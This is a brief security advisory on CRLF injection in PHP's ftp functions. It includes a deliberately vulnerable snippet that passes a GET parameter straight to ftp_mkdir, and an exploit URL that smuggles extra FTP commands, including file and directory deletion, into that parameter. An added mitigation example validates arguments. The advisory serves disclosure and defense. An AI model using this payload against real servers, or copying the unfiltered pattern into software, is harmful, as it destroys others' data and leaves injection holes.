
CRLF injection in PHP ftp function



We found a CRLF injection in the PHP ftp functions. As with HTTP, you can inject '\r\n other command' into the parameter of an ftp function such as ftp_mkdir, and PHP will send the \r\n to the connected FTP server. The server considers it a new command, and the other command is executed.
For example:

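// Hostname only: ftp_connect() takes a host, not a URL with a scheme.
$ftp_server='www.loveshell.net';
$ftp_user_name='loveshell';
$ftp_user_pass='loveshell';
// Attacker-controlled value, used below without any filtering.
$command = $_GET['dir'];

$conn_id = ftp_connect($ftp_server);
$login_result = ftp_login($conn_id, $ftp_user_name, $ftp_user_pass);
// Vulnerable call: any \r\n inside $command reaches the FTP control channel.
if($command) ftp_mkdir($conn_id, $command);
.......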

Exp: http://www.loveshell.net/test.php?dir=loveshell%0D%0AMKD jnc%0D%0ADELE jnc.txt%0D%0Armd test 

The directories loveshell and jnc are created, jnc.txt is deleted, and the directory test is deleted.

Tested on PHP 5.1.6; other functions are vulnerable as well.
 
loveshell[at]Bug.Center.Team
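
The mitigation on the application side is to refuse control characters in anything that becomes an FTP command argument. The following is an added example, not code from the original advisory; ftp_safe_arg(), ftp_mkdir_checked() and control_channel_lines() are hypothetical helper names, and the sample inputs are constructed from the values shown above.

```php
<?php
// Added example (not from the original advisory): reject control characters
// in any value that ends up as an FTP command argument.

/**
 * Hypothetical helper: returns $arg unchanged if it is safe to place on the
 * FTP control channel, otherwise throws.
 */
function ftp_safe_arg(string $arg): string
{
    // FTP commands are terminated by CRLF; NUL and the other C0 controls have
    // no place in a path either, so reject the whole range plus DEL.
    if ($arg === '' || preg_match('/[\x00-\x1F\x7F]/', $arg)) {
        throw new InvalidArgumentException('illegal character in FTP argument');
    }
    return $arg;
}

/** Hypothetical wrapper: validate first, then call the real ftp_mkdir(). */
function ftp_mkdir_checked($conn, string $dir)
{
    return ftp_mkdir($conn, ftp_safe_arg($dir));
}

/** Lines a server would parse if "$verb $arg\r\n" were written unfiltered. */
function control_channel_lines(string $verb, string $arg): array
{
    return array_values(array_filter(explode("\r\n", "$verb $arg\r\n"), 'strlen'));
}

// Constructed inputs: an ordinary name, and the advisory's parameter after
// URL decoding.
$samples = [
    'loveshell',
    urldecode('loveshell%0D%0AMKD jnc%0D%0ADELE jnc.txt%0D%0Armd test'),
];

foreach ($samples as $dir) {
    $lines = control_channel_lines('MKD', $dir);
    printf("%d command line(s) if sent unfiltered\n", count($lines));
    try {
        ftp_safe_arg($dir);
        echo "  accepted\n";
    } catch (InvalidArgumentException $e) {
        echo "  rejected: ", $e->getMessage(), "\n";
    }
}
```

The same check applies to every ftp_* call that takes a path or file name from user input, not only ftp_mkdir.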
